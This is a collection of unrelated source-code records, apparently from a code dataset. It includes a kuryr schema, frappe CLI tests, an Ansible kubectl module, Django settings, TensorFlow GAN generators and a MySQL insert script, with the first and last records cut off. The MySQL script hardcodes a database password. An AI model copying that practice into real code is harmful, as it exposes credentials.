upgrade complete.")
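The upgrade flow above hinges on addon_hash (imported but not shown) to fingerprint each addon directory. A minimal sketch of such a directory checksum using only the standard library — the real addon_hash in server-tools may differ, e.g. in how it handles translation files:

import fnmatch
import hashlib
import os


def dir_checksum(path, exclude_patterns=("*.pyc", "*.pyo", "static/*")):
    """Hash relative paths and file contents under `path`, skipping excluded files."""
    digest = hashlib.sha1()
    for root, dirs, files in os.walk(path):
        dirs.sort()  # deterministic traversal order
        for name in sorted(files):
            full = os.path.join(root, name)
            rel = os.path.relpath(full, path)
            if any(fnmatch.fnmatch(rel, pat) for pat in exclude_patterns):
                continue
            digest.update(rel.encode("utf-8"))
            with open(full, "rb") as handle:
                digest.update(handle.read())
    return digest.hexdigest()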
midonet/kuryr
kuryr/schemata/endpoint_delete.py
Python
apache-2.0
1,400
0
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License
at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distri
buted on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from kuryr.schemata import commons ENDPOINT_DELETE_SCHEMA = { u'links': [{ u'method': u'POST', u'href': u'/NetworkDriver.DeleteEndpoint', u'description': u'Delete an Endpoint', u'rel': u'self', u'title': u'Delete' }], u'title': u'Delete endpoint', u'required': [u'NetworkID', u'EndpointID'], u'definitions': {u'commons': {}}, u'$schema': u'http://json-schema.org/draft-04/hyper-schema', u'type': u'object', u'properties': { u'NetworkID': { u'description': u'Network ID', u'$ref': u'#/definitions/commons/definitions/id' }, u'EndpointID': { u'description': u'Endpoint ID', u'$ref': u'#/definitions/commons/definitions/id' } } } ENDPOINT_DELETE_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
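A quick way to exercise this schema is the jsonschema package; a sketch, assuming kuryr's commons document defines an `id` entry under its definitions (as the $ref paths imply) that accepts 64-character hex strings:

from jsonschema import Draft4Validator

# Hypothetical Docker-style IDs; real requests carry 64-char hex identifiers.
payload = {u'NetworkID': u'a' * 64, u'EndpointID': u'b' * 64}

# Raises jsonschema.exceptions.ValidationError when a required key is
# missing or malformed.
Draft4Validator(ENDPOINT_DELETE_SCHEMA).validate(payload)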
frappe/frappe
frappe/tests/test_commands.py
Python
mit
22,402
0.025266
# Copyright (c) 2022, Frappe Technologies Pvt. Ltd. and Contributors # License: MIT. See LICENSE # imports - standard imports import gzip import importlib import json import os import shlex import shutil import subprocess import unittest from contextlib import contextmanager from functools import wraps from glob import glob from typing import List, Optional from unittest.case import skipIf from unittest.mock import patch # imports - third party imports import click from click.testing import CliRunner, Result from click import Command # imports - module imports import frappe import frappe.commands.site import frappe.commands.utils import frappe.recorder from frappe.installer import add_to_installed_apps, remove_app from frappe.utils import add_to_date, get_bench_path, get_bench_relative_path, now from frappe.utils.backups import fetch_latest_backups _result: Optional[Result] = None TEST_SITE = "commands-site-O4PN2QKA.test" # added random string tag to avoid collisions CLI_CONTEXT = frappe._dict(sites=[TEST_SITE]) def clean(value) -> str: """Strips and converts bytes to str Args: value ([type]): [description] Returns: [type]: [description] """ if isinstance(value, bytes): value = value.decode() if isinstance(value, str): value = value.strip() return value def missing_in_backup(doctypes: List, file: os.PathLike) -> List: """Returns list of missing doctypes in the backup. Args: doctypes (list): List of DocTypes to be checked file (str): Path of the database file Returns: doctypes(list): doctypes that are missing in backup """ predicate = ( 'COPY public."tab{}"' if frappe.conf.db_type == "postgres" else "CREATE TABLE `tab{}`" ) with gzip.open(file, "rb") as f: content = f.read().decode("utf8").lower() return [doctype for doctype in doctypes if predicate.format(doctype).lower() not in content] def exists_in_backup(doctypes: List, file: os.PathLike) -> bool: """Checks if the list of doctypes exist in the database.sql.gz file supplied Args: doctypes (list): List of DocTypes to be checked file (str): Path of the database file Returns: bool: True if all tables exist """ missing_doctypes = missing_in_backup(doctypes, file) return len(missing_doctypes) == 0 @contextmanager def maintain_locals(): pre_site = frappe.local.site pre_flags = frappe.local.flags.copy() pre_db = frappe.local.db try: yield finally: post_site = getattr(frappe.local, "site", None) if not post_site or post_site != pre_site: frappe.init(site=pre_site) frappe.local.db = pre_db frappe.local.flags.update(pre_flags) def pass_test_context(f): @wraps(f) def decorated_function(*args, **kwargs): return f(CLI_CONTEXT, *args, **kwargs) return decorated_function @contextmanager def cli(cmd: Command, args: Optional[List] = None): with maintain_locals(): global _result patch_ctx = patch("frappe.commands.pass_context", pass_test_context) _module = cmd.callback.__module__ _cmd = cmd.callback.__qualname__ __module = importlib.import_module(_module) patch_ctx.start() importlib.reload(__module) click_cmd = getattr(__module, _cmd) try: _result = CliRunner().invoke(click_cmd, args=args) _result.command = str(cmd) yield _result finally: patch_ctx.stop() __module = importlib.import_module(_module) importlib.reload(__module) importlib.invalidate_caches() class BaseTestCommands(unittest.TestCase): @classmethod def setUpClass(cls) -> None: cls.setup_test_site() return super().setUpClass() @classmethod def execute(self, command, kwargs=None): site = {"site": frappe.local.site} cmd_input = None if kwargs: cmd_input = kwargs.get("cmd_input", None) if 
cmd_input: if not isinsta
nce(cmd_input, bytes): raise Exception( f"The input should be of type bytes, not {type(cmd_input).__name__}" ) del kwargs["cmd_input"] kwargs.update(site) else: kwargs = site self.command = " ".join(command.split()).format(**kwargs) click.secho(self.command, fg="bright_black")
command = shlex.split(self.command) self._proc = subprocess.run(command, input=cmd_input, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.stdout = clean(self._proc.stdout) self.stderr = clean(self._proc.stderr) self.returncode = clean(self._proc.returncode) @classmethod def setup_test_site(cls): cmd_config = { "test_site": TEST_SITE, "admin_password": frappe.conf.admin_password, "root_login": frappe.conf.root_login, "root_password": frappe.conf.root_password, "db_type": frappe.conf.db_type, } if not os.path.exists( os.path.join(TEST_SITE, "site_config.json") ): cls.execute( "bench new-site {test_site} --admin-password {admin_password} --db-type" " {db_type}", cmd_config, ) def _formatMessage(self, msg, standardMsg): output = super(BaseTestCommands, self)._formatMessage(msg, standardMsg) if not hasattr(self, "command") and _result: command = _result.command stdout = _result.stdout_bytes.decode() if _result.stdout_bytes else None stderr = _result.stderr_bytes.decode() if _result.stderr_bytes else None returncode = _result.exit_code else: command = self.command stdout = self.stdout stderr = self.stderr returncode = self.returncode cmd_execution_summary = "\n".join([ "-" * 70, "Last Command Execution Summary:", "Command: {}".format(command) if command else "", "Standard Output: {}".format(stdout) if stdout else "", "Standard Error: {}".format(stderr) if stderr else "", "Return Code: {}".format(returncode) if returncode else "", ]).strip() return "{}\n\n{}".format(output, cmd_execution_summary) class TestCommands(BaseTestCommands): def test_execute(self): # test 1: execute a command expecting a numeric output self.execute("bench --site {site} execute frappe.db.get_database_size") self.assertEqual(self.returncode, 0) self.assertIsInstance(float(self.stdout), float) # test 2: execute a command expecting an errored output as local won't exist self.execute("bench --site {site} execute frappe.local.site") self.assertEqual(self.returncode, 1) self.assertIsNotNone(self.stderr) # test 3: execute a command with kwargs # Note: # terminal command has been escaped to avoid .format string replacement # The returned value has quotes which have been trimmed for the test self.execute("""bench --site {site} execute frappe.bold --kwargs '{{"text": "DocType"}}'""") self.assertEqual(self.returncode, 0) self.assertEqual(self.stdout[1:-1], frappe.bold(text="DocType")) @unittest.skip def test_restore(self): # step 0: create a site to run the test on global_config = { "admin_password": frappe.conf.admin_password, "root_login": frappe.conf.root_login, "root_password": frappe.conf.root_password, "db_type": frappe.conf.db_type, } site_data = {"test_site": TEST_SITE, **global_config} for key, value in global_config.items(): if value: self.execute(f"bench set-config {key} {value} -g") # test 1: bench restore from full backup self.execute("bench --site {test_site} backup --ignore-backup-conf", site_data) self.execute( "bench --site {test_site} execute frappe.utils.backups.fetch_latest_backups", site_data, ) site_data.update({"database": json.loads(self.stdout)["database"]}) self.execute("bench --site {test_site} restore {database}", site_data) # test 2: restore from partial backup self.execute("bench --site {test_site} backup --exclude 'ToDo'", site_data) site_data.update({"kw": "\"{'partial':True}\""}) self.execute( "bench --site {test_site} execute" " frappe.utils.backups.fetch_latest_backups --kwargs {kw}", site_data, ) site_data.update({"database": json.loads(self.stdout)["database"]}) self.execute("bench --site 
{test_site} restore {database}", site_data) self.assertEqual(self.returncode, 1) def test_partial_restore(self): _now = now() for num in range(10): frappe.get_doc({ "doctype": "ToDo", "date": add_to_date(_now, days=num), "description": frappe.mock("paragraph") }).insert() frappe.db.commit() todo_count = frappe.db
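The cli() helper in the (truncated) record above is a thin wrapper over click's test runner; a self-contained illustration of the same CliRunner pattern, using a hypothetical command rather than an actual frappe one:

import click
from click.testing import CliRunner


@click.command()
@click.option("--name", default="world")
def greet(name):
    click.echo("hello {}".format(name))


result = CliRunner().invoke(greet, ["--name", "frappe"])
assert result.exit_code == 0
assert result.output.strip() == "hello frappe"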
insequent/kargo
library/kube.py
Python
apache-2.0
8,694
0.00161
#!/usr/bin/python # -*- coding: utf-8 -*- DOCUMENTATION = """ --- module: kube short_description: Manage Kubernetes Cluster description: - Create, replace, remove, and stop resources within a Kubernetes Cluster version_added: "2.0" options: name: required: false default: null description: - The name associated with resource filename: required: false default: null description: - The path and filename of the resource(s) definition file(s). - To operate on several files this can accept a comma separated list of files or a list of files. aliases: [ 'files', 'file', 'filenames' ] kubectl: required: false default: null description: - The path to the kubectl bin namespace: required: false default: null description: - The namespace associated with the resource(s) resource: required: false default: null description: - The resource to perform an action on. pods (po), replicationControllers (rc), services (svc) label: required: false default: null description: - The labels used to filter specific resources. server: required: false default: null description: - The url for the API server that commands are executed against. force: required: false default: false description: - A flag to indicate to force delete, replace, or stop. all: required: false default: false description: - A flag to indicate delete all, stop all, or all namespaces when checking exists. log_level: required: false default: 0 description: - Indicates the level of verbosity of logging by kubectl. state: required: false choices: ['present', 'absent', 'latest', 'reloaded', 'stopped'] default: present description: - present handles checking existence or creating if definition file provided, absent handles deleting resource(s) based on other options, latest handles creating or updating based on existence, reloaded handles updating resource(s) definition using definition file, stopped handles stopping resource(s) based on other options. 
requirements: - kubectl author: "Kenny Jones (@kenjones-cisco)" """ EXAMPLES = """ - name: test nginx is present kube: name=nginx resource=rc state=present - name: test nginx is stopped kube: name=nginx resource=rc state=stopped - name: test nginx is absent kube: name=nginx resource=rc state=absent - name: test nginx is present kube: filename=/tmp/nginx.yml - name: test nginx and postgresql are present kube: files=/tmp/nginx.yml,/tmp/postgresql.yml - name: test nginx and postgresql are present kube: files: - /tmp/nginx.yml - /tmp/postgresql.yml """ class KubeManager(object): def __init__(self, module): self.module = module self.kubectl = module.params.get('kubectl') if self.kubectl is None: self.kubectl = module.get_bin_path('kubectl', True) self.base_cmd = [self.kubectl] if module.params.get('server'): self.base_cmd.append('--server=' + module.params.get('server')) if module.params.get('log_level'): self.base_cmd.append('--v=' + str(module.params.get('log_level'))) if module.params.get('namespace'): self.base_cmd.append('--namespace=' + module.params.get('namespace')) self.all = module.params.get('all') self.force = module.params.get('force') self.name = module.params.get('name') self.filename = [f.strip() for f in module.params.get('filename') or []] self.resource = module.params.get('resource') self.label = module.params.get('label') def _execute(self, cmd): args = self.base_cmd + cmd try: rc, out, err = self.module.run_command(args) if rc != 0: self.module.fail_json( msg='error running kubectl (%s) command (rc=%d), out=\'%s\', err=\'%s\'' % (' '.join(args), rc, out, err)) except Exception as exc: self.module.fail_json( msg='error running kubectl (%s) command: %s' % (' '.join(args), str(exc))) return out.splitlines() def _execute_nofail(self, cmd): args = self.base_cmd + cmd rc, out, err = self.module.run_command(args) if rc != 0: return None return out.splitlines() def create(self, check=True, force=True): if check and self.exists(): return [] cmd = ['apply'] if force: cm
d.append('--force') if not self.filename: self.module.fail_json(msg='filename required to create') cmd.append('--filename=' + ','.join(self.filename))
return self._execute(cmd) def replace(self, force=True): cmd = ['apply'] if force: cmd.append('--force') if not self.filename: self.module.fail_json(msg='filename required to reload') cmd.append('--filename=' + ','.join(self.filename)) return self._execute(cmd) def delete(self): if not self.force and not self.exists(): return [] cmd = ['delete'] if self.filename: cmd.append('--filename=' + ','.join(self.filename)) else: if not self.resource: self.module.fail_json(msg='resource required to delete without filename') cmd.append(self.resource) if self.name: cmd.append(self.name) if self.label: cmd.append('--selector=' + self.label) if self.all: cmd.append('--all') if self.force: cmd.append('--ignore-not-found') return self._execute(cmd) def exists(self): cmd = ['get'] if self.filename: cmd.append('--filename=' + ','.join(self.filename)) else: if not self.resource: self.module.fail_json(msg='resource required without filename') cmd.append(self.resource) if self.name: cmd.append(self.name) if self.label: cmd.append('--selector=' + self.label) if self.all: cmd.append('--all-namespaces') cmd.append('--no-headers') result = self._execute_nofail(cmd) if not result: return False return True # TODO: This is currently unused, perhaps convert to 'scale' with a replicas param? def stop(self): if not self.force and not self.exists(): return [] cmd = ['stop'] if self.filename: cmd.append('--filename=' + ','.join(self.filename)) else: if not self.resource: self.module.fail_json(msg='resource required to stop without filename') cmd.append(self.resource) if self.name: cmd.append(self.name) if self.label: cmd.append('--selector=' + self.label) if self.all: cmd.append('--all') if self.force: cmd.append('--ignore-not-found') return self._execute(cmd) def main(): module = AnsibleModule( argument_spec=dict( name=dict(), filename=dict(type='list', aliases=['files', 'file', 'filenames']), namespace=dict(), resource=dict(), label=dict(), server=dict(), kubectl=dict(), force=dict(default=False, type='bool'), all=dict(default=False, type='bool'), log_level=dict(default=0, type='int'), state=dict(default='present', choices=['present', 'absent', 'latest', 'reloaded', 'stopped']), ), mutually_exclusive=[['filename', 'list']] ) changed = False manager = KubeManager(module) state = module.params.get('state') if state == 'present': result = manager.create(check=False) elif state == 'absent
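The record is cut off inside main()'s state dispatch. A hedged reconstruction of the remaining branches, inferred from the KubeManager methods defined above rather than copied from the original file:

    # ...continuing main(); 'absent' is the branch truncated above.
    elif state == 'absent':
        result = manager.delete()
    elif state == 'reloaded':
        result = manager.replace()
    elif state == 'stopped':
        result = manager.stop()
    elif state == 'latest':
        result = manager.replace()
    if result:
        changed = True
    module.exit_json(changed=changed, msg='success: %s' % ' '.join(result))

# Ansible modules of this era typically end with a star import of the module
# boilerplate and a main() guard (an assumption here, not from the source):
# from ansible.module_utils.basic import *
# if __name__ == '__main__':
#     main()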
JavierGarciaD/Algorithmic_Thinking
src/project_3_test_data.py
Python
gpl-3.0
2,503
0.003196
''' Created on 26/09/2014 @author: javgar119 ''' cluster_list =([Cluster(set([]), 0, 0, 1, 0), Cluster(set([]), 1, 0, 1, 0)]) cluster_list2 = ([Cluster(set([]), 0, 0, 1, 0), Cluster(set([]), 1, 0, 1, 0), Cluster(set([]), 2, 0, 1, 0), Cluster(set([]), 3, 0, 1, 0), Cluster(set([]), 4, 0, 1, 0), Cluster(set([]), 5, 0, 1, 0), Cluster(set([]), 6, 0, 1, 0), Cluster(set([]), 7, 0, 1, 0), Cluster(set([]), 8, 0, 1, 0), Cluster(set([]), 9, 0, 1, 0), Cluster(set([]), 10, 0, 1, 0), Cluster(set([]), 11, 0, 1, 0), Cluster(set([]), 12, 0, 1, 0), Cluster(set([]), 13, 0, 1, 0), Cluster(set([]), 14, 0, 1, 0), Cluster(set([]), 15, 0, 1, 0), Cluster(set([]), 16, 0, 1, 0), Cluster(set([]), 17, 0, 1, 0), Cluster(set([]), 18, 0, 1, 0), Cluster(set([]), 19, 0, 1, 0)]) expected = set([(1.0, 0, 1)]) expected2 = set([(1.0, 9, 10), (1.0, 2, 3), (1.0, 15, 16), (1.0, 11, 12), (1.0, 13, 14), (1.0, 16, 17), (1.0, 14, 15), (1.0, 12, 13), (1.0, 4, 5), (1.0, 18, 19), (1.0, 3, 4), (1.0, 8, 9), (1.0, 17, 18), (1.0, 6, 7), (1.0, 7, 8), (1.0, 5, 6), (1.0, 10, 11), (1.0, 0, 1), (1.0, 1, 2)]) cluster_list3 = ([Cluster(set([]), 90.9548590217, -17.089022585, 1, 0), Cluster(set([]), 90.2536656675, -70.5911544718, 1, 0),
Cluster(set([]), -57.5872347006, 99.7124028905, 1, 0), Cluster(set([]), -15.9338519877, 5.91547495626, 1, 0), Cluster(set([]), 19.1869055492, -28.0681513017, 1, 0), Cluster(set([]), -23.0752410653, -42.1353490324, 1, 0), Cluster(set([]), -65.1732261872, 19.675582646, 1, 0),
Cluster(set([]), 99.7789872101, -11.2619165604, 1, 0), Cluster(set([]), -43.3699854405, -94.7349852817, 1, 0), Cluster(set([]), 48.2281912402, -53.3441788034, 1, 0)]) expected3 = set([(10.5745166749, 0, 7)])
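These fixtures drive a closest-pair search over cluster centers. A brute-force reference that returns (distance, idx1, idx2) tuples of the expected shape, assuming the course's Cluster class exposes a distance() method between two clusters:

def slow_closest_pair(cluster_list):
    """O(n^2) scan for the minimal (distance, idx1, idx2) with idx1 < idx2."""
    best = (float('inf'), -1, -1)
    for idx1 in range(len(cluster_list)):
        for idx2 in range(idx1 + 1, len(cluster_list)):
            dist = cluster_list[idx1].distance(cluster_list[idx2])
            best = min(best, (dist, idx1, idx2))
    return best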
stefan-walluhn/RPi.TC
tests/test_out.py
Python
gpl-3.0
607
0
from rpitc.io import IO
class TestOut: def test_init_on(self, gpio): from rpitc.io.out import Out out = Out(7, status=IO.ON) assert out.status == IO.ON out.off() def test_set_pin(self, out): assert out.set_pin(IO.ON) == IO.ON def test_on(self, out): out.on() assert out.status == IO.ON def test_off(self, out): out.off() assert out.status == IO.OFF def test_toggle(self, out): out.off() out.toggle()
assert out.status == IO.ON out.toggle() assert out.status == IO.OFF
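The suite depends on gpio and out fixtures defined outside this record, presumably in a conftest.py that stubs the GPIO hardware. A sketch of what the out fixture might look like, assuming it builds on that gpio stub:

import pytest

from rpitc.io import IO
from rpitc.io.out import Out


@pytest.fixture
def out(gpio):
    # Pin 7 mirrors test_init_on; start each test from a known OFF state.
    return Out(7, status=IO.OFF)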
MarionTheBull/watchmaker
tests/test_watchmaker.py
Python
apache-2.0
209
0
import pytest import watchmaker
@pytest.fixture def setup_object(): pass def test_main(): """Placeholder for tests""" # Placeholder assert watchmaker.__ve
rsion__ == watchmaker.__version__
dsanders11/django-future-staticfiles
tests/staticfiles_tests/signals.py
Python
bsd-3-clause
3,301
0
import os import threading import time from django.conf import settings from django.db import connections from django.dispatch import receiver from django.test.signals import setting_changed from django.utils import timezone from django.utils.functional import empty # Most setting_changed receivers are supposed to be added below, # except for cases where the receiver is related to a contrib app. @receiver(setting_changed) def clear_cache_handlers(**kwargs): if kwargs['setting'] == 'CACHES': from django.core.cache import caches caches._caches = threading.local() @receiver(setting_changed) def update_connections_time_zone(**kwargs): if kwargs['setting'] == 'TIME_ZONE': # Reset process time zone if hasattr(time, 'tzset'): if kwargs['value']: os.environ['TZ'] = kwargs['value'] else: os.environ.pop('TZ', None) time.tzset() # Reset local time zone cache timezone.get_default_timezone.cache_clear() # Reset the database connections' time zone if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC': USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ: USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value'] else: # no need to change the database connections' time zones return tz = 'UTC' if USE_TZ else TIME_ZONE for conn in connections.all(): conn.settings_dict['TIME_ZONE'] = tz tz_sql = conn.ops.set_time_zone_sql() if tz_sql: conn.cursor().execute(tz_sql, [tz]) @receiver(setting_changed) def clear_serializers_cache(**kwargs): if kwargs['setting'] == 'SERIALIZATION_MODULES': from django.core import serializers serializers._serializers = {} @receiver(setting_changed) def language_changed(**kwargs): if kwargs['setting'] in ['LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS']: from django.utils.translation import trans_real trans_real._default = None trans_real._active = thre
ading.local() if kwargs['setting'] in ['LANGUAGES', 'LOCALE_PATHS']: from django.utils.translation import trans_real trans_real._translations = {} trans_real.check_for_language.cache_clear() @receiver(setting_changed) def file_storage_changed(**kwargs): file_s
torage_settings = [ 'DEFAULT_FILE_STORAGE', 'FILE_UPLOAD_DIRECTORY_PERMISSIONS', 'FILE_UPLOAD_PERMISSIONS', 'MEDIA_ROOT', 'MEDIA_URL', ] if kwargs['setting'] in file_storage_settings: from django.core.files.storage import default_storage default_storage._wrapped = empty @receiver(setting_changed) def root_urlconf_changed(**kwargs): if kwargs['setting'] == 'ROOT_URLCONF': from django.core.urlresolvers import clear_url_caches, set_urlconf clear_url_caches() set_urlconf(None) @receiver(setting_changed) def static_storage_changed(**kwargs): if kwargs['setting'] in [ 'STATICFILES_STORAGE', 'STATIC_ROOT', 'STATIC_URL', ]: from django.contrib.staticfiles.storage import staticfiles_storage staticfiles_storage._wrapped = empty
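Every receiver in this module follows the same shape: match on kwargs['setting'], then drop the stale cache. A minimal receiver of the same form, using a hypothetical module-level cache:

from django.dispatch import receiver
from django.test.signals import setting_changed

_feature_flags = {}


@receiver(setting_changed)
def clear_feature_flags(**kwargs):
    # setting_changed sends 'setting' (the name) and 'value' (the new value).
    if kwargs['setting'] == 'FEATURE_FLAGS':
        _feature_flags.clear()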
giliam/turbo-songwriter
backend/turbosettings/settings.py
Python
mit
4,924
0.001422
# coding:utf-8 """ Django settings for turbo project. Generated by 'django-admin startproject' using Django 1.11.1. For more information on this file, see https://docs.djangoproject.com/en/1.11/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.11/ref/settings/ """ import datetime import os import turbosettings.parameters as parameters from turbosettings.generate_secret_key import secret_key_from_file # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) PROJECT_PATH = os.path.realpath(os.path.dirname(__file__)) USE_X_FORWARDED_HOST = False FORCE_SCRIPT_NAME = "" # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = secret_key_from_file('secret_key') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'songwriter', 'corsheaders', 'debug_toolbar', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'debug_toolbar.middleware.DebugToolbarMiddleware', ] ROOT_URLCONF = 'turbosettings.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': parameters.TEMPLATES_DIRS if parameters.TEMPLATES_DIRS else [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', 'django.template.context_processors.media', ], 'builtins': [ 'django.templatetags.i18n', 'django.contrib.humanize.templatetags.humanize', 'django.contrib.staticfiles.templatetags.staticfiles', ], }, }, ] WSGI_APPLICATION = 'turbosettings.wsgi.application' CORS_ORIGIN_WHITELIST = [ 'localhost:8080', '127.0.0.1:8080', ] # Database # https://docs.djangoproject.com/en/1.11/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators AUTH_PASSWORD_V
ALIDATORS = [
{ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.11/topics/i18n/ LANGUAGE_CODE = 'fr' TIME_ZONE = "Europe/Paris" USE_I18N = True USE_L10N = True USE_TZ = True gettext = lambda x: x LANGUAGES = ( ('fr', gettext('Français')), ('en', gettext('English')), ) LOCALE_PATHS = ( os.path.join(BASE_DIR, 'locale/'), ) # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.11/howto/static-files/ STATIC_URL = FORCE_SCRIPT_NAME + "/static/" STATIC_ROOT = BASE_DIR + '/static/' STATICFILES_DIRS = parameters.STATICFILES_DIRS if parameters.STATICFILES_DIRS else ( "assets/", ) FIXTURE_DIRS = ( 'fixtures/' ) MEDIA_URL = '/' MEDIA_ROOT = BASE_DIR + '/media/' REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', ), 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework_jwt.authentication.JSONWebTokenAuthentication', ), } JWT_AUTH = { 'JWT_SECRET_KEY': secret_key_from_file('secret_key_jwt'), 'JWT_ALLOW_REFRESH': True, 'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=18000), } # For debug toolbar INTERNAL_IPS = ["127.0.0.1"] from turbosettings.settings_local import *
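secret_key_from_file comes from a local helper that is not part of this record. The usual pattern is generate-once-then-reuse; a sketch with the function name taken from the import above but the body assumed:

import os

from django.core.management.utils import get_random_secret_key


def secret_key_from_file(filename):
    """Return the key stored in `filename`, creating it on first run."""
    if not os.path.exists(filename):
        with open(filename, 'w') as handle:
            handle.write(get_random_secret_key())
    with open(filename) as handle:
        return handle.read().strip()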
bgroveben/python3_machine_learning_projects
learn_kaggle/deep_learning/packages/learntools/gans/generators.py
Python
mit
2,657
0.007151
import tensorflow as tf from tensorflow.python.keras.layers import Conv2D, Conv2DTranspose, Conv3D, Dense, Reshape tfgan = tf.contrib.gan def basic_generator(noise): """Simple generator to produce MNIST images. Args: noise: A single Tensor representing noise. Returns: A generated image in the range [-1, 1]. """ channels_after_reshape = 256 net = Dense(1024, activation='elu')(noise) net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net) net = Reshape([7, 7, channels_after_reshape])(net) net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net) net = Conv2DTranspose(32, kernel_size=4, strides=
2, padding="same", activation='elu')(net) # Make sure that ge
nerator output is in the same range as `inputs` # ie [-1, 1]. net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net) return net def conditional_generator(inputs): """Generator to produce MNIST images. Args: inputs: A 2-tuple of Tensors (noise, one_hot_labels). Returns: A generated image in the range [-1, 1]. """ noise, one_hot_labels = inputs channels_after_reshape = 128 net = Dense(1024, activation='elu')(noise) net = tfgan.features.condition_tensor_from_onehot(net, one_hot_labels) net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net) net = Reshape([7, 7, channels_after_reshape])(net) net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net) net = Conv2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net) # Make sure that generator output is in the same range as `inputs` # ie [-1, 1]. net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net) return net def encoder_decoder_generator(start_img): """ """ layer1 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(start_img) layer2 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(layer1) layer3 = Conv2D(64, kernel_size=4, strides=1, activation='elu', padding='same')(layer2) layer4 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer3) layer5 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer4) layer6 = Conv2D(64, kernel_size=2, strides=1, activation='elu', padding='same')(layer5) # Make sure that generator output is in the same range as `inputs` # ie [-1, 1]. net = Conv2D(3, kernel_size=1, activation = 'tanh', padding='same')(layer6) return net
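A usage sketch for basic_generator, assuming the TF1-style graph mode implied by tf.contrib and an arbitrary 64-dimensional noise vector; the two stride-2 transposed convolutions upsample the 7x7 feature map to 28x28:

import tensorflow as tf

batch_size = 16
noise = tf.random_normal([batch_size, 64])  # any noise width works here
fake_images = basic_generator(noise)        # -> (16, 28, 28, 1), values in [-1, 1]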
dbarobin/pytools
py-practice/insert_data.py
Python
gpl-2.0
868
0.002304
#!/usr/bin/python # -*- coding: utf-8 -*- # Author: Robin Wen # Date: 2014-11-18 # Desc: Connect to MySQL using MySQLdb package, and insert test data. import MySQLdb as mdb con = mdb.connect(host='10.10.3.121', user='robin', passwd='robin89@DBA', db='testdb', unix_socket='/tmp/mysql5173.sock', port=5173
) with con: cur = con.cursor() cur.execute("DROP TABLE IF EXISTS Writers") cur.execute("CREATE TABLE Writers(Id INT PRIMARY KEY AUTO_INCREMENT, \ Name VARCHAR(25))") cur.execute("INSERT INTO Writers(Name) VALUES('Jack London')") cur.execute("INSERT INTO Writers(Name) VALUES('Honore de Balzac')") cur.execute("INSERT INTO W
riters(Name) VALUES('Lion Feuchtwanger')") cur.execute("INSERT INTO Writers(Name) VALUES('Emile Zola')") cur.execute("INSERT INTO Writers(Name) VALUES('Truman Capote')") con.close()
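Building INSERT strings by hand is fine for fixed test rows, but variable values should go through the driver's parameter binding. An equivalent sketch using executemany, with placeholder credentials:

import MySQLdb as mdb

con = mdb.connect(host='127.0.0.1', user='user', passwd='secret', db='testdb')
with con:
    cur = con.cursor()
    writers = [('Jack London',), ('Honore de Balzac',), ('Lion Feuchtwanger',),
               ('Emile Zola',), ('Truman Capote',)]
    # %s placeholders let the driver escape each value.
    cur.executemany("INSERT INTO Writers(Name) VALUES(%s)", writers)
con.close()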
chrisortman/CIS-121
k0459866/Lessons/ex12.py
Python
mit
